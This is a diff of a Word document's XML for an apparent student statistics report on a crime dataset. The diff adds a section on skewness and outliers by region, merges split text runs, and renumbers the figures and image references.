-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>bellow</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>The crime_df</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dataset is shown bellow.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5957,7 +5800,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6348650D" wp14:editId="19051A44">
             <wp:extent cx="3200651" cy="2397812"/>
@@ -6058,25 +5900,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">This process will be performed on </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Jupyter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> notebook:</w:t>
+        <w:t>This process will be performed on Jupyter notebook:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6196,14 +6020,190 @@
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>Skewness and Outliers:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Skewness is a measure of how much the distribution of a random variable deviates from symmetry.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>It is important to consider the skewness when performing statistical tests. In some statistical tests, if the data is skewed, these tests may not be valid.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Skewness is classified as follows:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Highly skewed: Less than -1 or greater than 1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Moderately skewed: Between -1 and -0.5 or between 0.5 and 1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Approximately symmetrical: Between -0.5 and 0.5</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73984A93" wp14:editId="47DE7D47">
+            <wp:extent cx="4481225" cy="3548062"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1748178467" name="Picture 1" descr="A group of blue and white graphs&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1748178467" name="Picture 1" descr="A group of blue and white graphs&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4503626" cy="3565799"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6213,9 +6213,229 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figure 01: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Skewness </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>by region</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Insights</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>From this figure, we can observe that aside from the Border region, which exhibits a highly positive skew, the skewness of the data is relatively mild. Therefore, it is not necessary to perform any transformations on the data for the purpose of data visualization.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Below, the</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> print</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>the skew value for each region</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F913915" wp14:editId="686C97D7">
+            <wp:extent cx="4991100" cy="1463980"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
+            <wp:docPr id="1784899456" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1784899456" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5002772" cy="1467404"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
         <w:t>BoxPlot</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6438,6 +6658,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18B54D9D" wp14:editId="0DEDAB32">
             <wp:extent cx="5343525" cy="2430400"/>
@@ -6456,7 +6677,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9">
+                    <a:blip r:embed="rId11">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -6503,7 +6724,27 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Figure 01: Boxplot  </w:t>
+        <w:t>Figure 0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: Boxplot  </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6558,7 +6799,6 @@
           <w:kern w:val="0"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>From this boxplot we can get some Insights:</w:t>
       </w:r>
     </w:p>
@@ -7071,6 +7311,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77F6BDB8" wp14:editId="7E1D6D9D">
             <wp:extent cx="5797134" cy="1971675"/>
@@ -7089,7 +7330,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId10">
+                    <a:blip r:embed="rId12">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -7255,7 +7496,6 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:tab/>
         <w:t>From Pie charts we can get following insights:</w:t>
       </w:r>
@@ -7407,27 +7647,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">sing </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>numpy.ravel</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>() function we can flattens a NumPy array into a 1D array.</w:t>
+        <w:t>sing numpy.ravel() function we can flattens a NumPy array into a 1D array.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7497,6 +7717,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5946AAFE" wp14:editId="4E8CC8EC">
             <wp:extent cx="5153343" cy="2183140"/>
@@ -7515,7 +7736,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11">
+                    <a:blip r:embed="rId13">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -7842,18 +8063,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t>Statistics for Data Analytics</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">Statistics for Data Analytics </w:t>
       </w:r>
       <w:bookmarkEnd w:id="3"/>
     </w:p>
@@ -7986,6 +8196,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Using the method describe, we can get important information from the result</w:t>
       </w:r>
     </w:p>
@@ -8527,7 +8738,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
+                    <a:blip r:embed="rId14"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -8601,7 +8812,7 @@
         <w:spacing w:line="288" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -8610,21 +8821,8 @@
         <w:pStyle w:val="NormalWeb"/>
         <w:jc w:val="both"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Pmf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Cdf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> are classes that represent probability mass functions (PMFs) and cumulative distribution functions (CDFs), respectively.</w:t>
+      <w:r>
+        <w:t>Pmf and Cdf are classes that represent probability mass functions (PMFs) and cumulative distribution functions (CDFs), respectively.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8650,10 +8848,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t>A CDF is a function that gives the probability that a random variable will take on a value less than or equal to a given value</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
+        <w:t>A CDF is a function that gives the probability that a random variable will take on a value less than or equal to a given value.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8662,15 +8857,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Before getting the PMF and CDF information, its </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>importante</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> to prepare the dataset.</w:t>
+        <w:t>Before getting the PMF and CDF information, its importante to prepare the dataset.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8679,7 +8866,6 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:tab/>
       </w:r>
       <w:r>
@@ -8704,6 +8890,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7109AA25" wp14:editId="1FB6D949">
             <wp:extent cx="4764741" cy="2127275"/>
@@ -8720,7 +8907,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13"/>
+                    <a:blip r:embed="rId15"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -8834,7 +9021,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14">
+                    <a:blip r:embed="rId16">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -8884,56 +9071,16 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">To get the exact values, we can also explore the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>pmi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> itself</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, here are a way to explore the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>pmi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
